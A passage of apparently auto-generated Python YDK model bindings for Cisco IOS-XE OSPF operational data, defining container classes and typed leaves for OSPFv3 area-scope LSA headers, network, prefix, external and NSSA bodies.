    self.yang_parent_name = "area-scope-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    # Child containers: yang-name -> (python attribute, binding class)
    self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody))])
    self._leafs = OrderedDict()  # no direct leaves on this node
    # Eagerly construct both child containers and link them back to this parent
    self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header()
    self.header.parent = self
    self._children_name_map["header"] = "header"
    self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody()
    self.lsa_body.parent = self
    self._children_name_map["lsa_body"] = "lsa-body"
    self._segment_path = lambda: "ospfv3-lsa"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: no user-settable leaves here (empty whitelist).
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv3 LSA header
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: lsa_header
LSA header
**type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader>`
**config**\: False
.. attribute:: lsa_hdr_options
OSPFv3 LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata, leaves, and the nested lsa-header container for 'header'."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__()
    self.yang_name = "header"
    self.yang_parent_name = "ospfv3-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))])
    # lsa-id accepts two string forms (IPv4 or IPv6 per the docstring patterns); options is a YANG bits leaf
    self._leafs = OrderedDict([
        ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
        ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
    ])
    self.lsa_id = None
    self.lsa_hdr_options = Bits()
    self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader()
    self.lsa_header.parent = self
    self._children_name_map["lsa_header"] = "lsa-header"
    self._segment_path = lambda: "header"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
"""
LSA header
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the decoded 'lsa-header' container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__()
    self.yang_name = "lsa-header"
    self.yang_parent_name = "header"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    # Leaf descriptors: python name -> (YLeaf(type, yang-name), accepted python types)
    self._leafs = OrderedDict([
        ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
        ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
        ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
        ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
        ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
        ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
    ])
    self.age = None
    self.type = None
    self.adv_router = None
    self.seq_num = None
    self.checksum = None
    self.length = None
    self._segment_path = lambda: "lsa-header"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata, flag leaves, and the seven LSA-body child containers."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__()
    self.yang_name = "lsa-body"
    self.yang_parent_name = "ospfv3-lsa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    # Child containers: yang-name -> (python attribute, binding class), one per decoded LSA body kind
    self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix))])
    # Both direct leaves are YANG bits
    self._leafs = OrderedDict([
        ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
        ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
    ])
    self.lsa_flag_options = Bits()
    self.lsa_body_flags = Bits()
    # Eagerly construct each child container and link it back to this parent
    self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network()
    self.network.parent = self
    self._children_name_map["network"] = "network"
    self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix()
    self.prefix.parent = self
    self._children_name_map["prefix"] = "prefix"
    self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter()
    self.ia_router.parent = self
    self._children_name_map["ia_router"] = "ia-router"
    self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal()
    self.lsa_external.parent = self
    self._children_name_map["lsa_external"] = "lsa-external"
    self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa()
    self.nssa.parent = self
    self._children_name_map["nssa"] = "nssa"
    self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData()
    self.link_data.parent = self
    self._children_name_map["link_data"] = "link-data"
    self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix()
    self.ia_prefix.parent = self
    self._children_name_map["ia_prefix"] = "ia-prefix"
    self._segment_path = lambda: "lsa-body"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
"""
OSPFv3 network
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_net_options
Network LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the 'network' LSA-body container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__()
    self.yang_name = "network"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    # attached-router is a leaf-list (YLeafList) of router IDs; options is a YANG bits leaf
    self._leafs = OrderedDict([
        ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
        ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
    ])
    self.attached_router = []
    self.lsa_net_options = Bits()
    self._segment_path = lambda: "network"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
"""
OSPFv3 inter area prefix
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ia_prefix
Inter area Prefix
**type**\: str
**config**\: False
.. attribute:: ia_prefix_options
Inter area prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the inter-area 'prefix' container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
    self.yang_name = "prefix"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    # Leaf descriptors: python name -> (YLeaf(type, yang-name), accepted python types)
    self._leafs = OrderedDict([
        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
        ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
        ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
    ])
    self.metric = None
    self.ia_prefix = None
    self.ia_prefix_options = None
    self._segment_path = lambda: "prefix"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
"""
OSPFv3 inter area router
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: destination_router_id
Router ID of the router being described by the LSA
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_ia_options
Inter area LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and leaf storage for the inter-area 'ia-router' container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
    self.yang_name = "ia-router"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    # lsa-ia-options is a YANG bits leaf
    self._leafs = OrderedDict([
        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
        ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
        ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
    ])
    self.metric = None
    self.destination_router_id = None
    self.lsa_ia_options = Bits()
    self._segment_path = lambda: "ia-router"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
"""
OSPFv3 LSA external
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata, leaves, and the nested flags container for 'lsa-external'."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
    self.yang_name = "lsa-external"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
    # forwarding-address accepts two string forms (IPv4 or IPv6 per the docstring patterns)
    self._leafs = OrderedDict([
        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
        ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
        ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
        ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
        ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
    ])
    self.metric = None
    self.referenced_ls_type = None
    self.external_prefix = None
    self.external_prefix_options = None
    self.forwarding_address = None
    self.external_route_tag = None
    self.referenced_link_state_id = None
    self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
    self.flags.parent = self
    self._children_name_map["flags"] = "flags"
    self._segment_path = lambda: "lsa-external"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and the single e-flag leaf for the 'flags' container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
    self.yang_name = "flags"
    self.yang_parent_name = "lsa-external"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    self._leafs = OrderedDict([
        ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
    ])
    self.e_flag = None
    self._segment_path = lambda: "flags"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and the nested lsa-nssa-external container for 'nssa'."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
    self.yang_name = "nssa"
    self.yang_parent_name = "lsa-body"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
    self._leafs = OrderedDict()  # no direct leaves on this node
    self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
    self.lsa_nssa_external.parent = self
    self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
    self._segment_path = lambda: "nssa"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: no user-settable leaves here (empty whitelist).
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
"""
NSSA LSA
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata, leaves, and the nested flags container for 'lsa-nssa-external'."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
    self.yang_name = "lsa-nssa-external"
    self.yang_parent_name = "nssa"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
    # Same leaf set as LsaExternal; forwarding-address accepts IPv4 or IPv6 string forms
    self._leafs = OrderedDict([
        ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
        ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
        ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
        ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
        ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
        ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
    ])
    self.metric = None
    self.referenced_ls_type = None
    self.external_prefix = None
    self.external_prefix_options = None
    self.forwarding_address = None
    self.external_route_tag = None
    self.referenced_link_state_id = None
    self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
    self.flags.parent = self
    self._children_name_map["flags"] = "flags"
    self._segment_path = lambda: "lsa-nssa-external"
    self._is_frozen = True  # later attribute writes are routed through __setattr__ below
def __setattr__(self, name, value):
    # Generated hook: forward writes plus the settable leaf-name list to the Entity base machinery.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    """Install generated YANG metadata and the single e-flag leaf for the NSSA 'flags' container."""
    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
    self.yang_name = "flags"
    self.yang_parent_name = "lsa-nssa-external"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []  # container, not a keyed list
    self._child_classes = OrderedDict([])  # leaf-only node: no child containers
    self._leafs = OrderedDict([
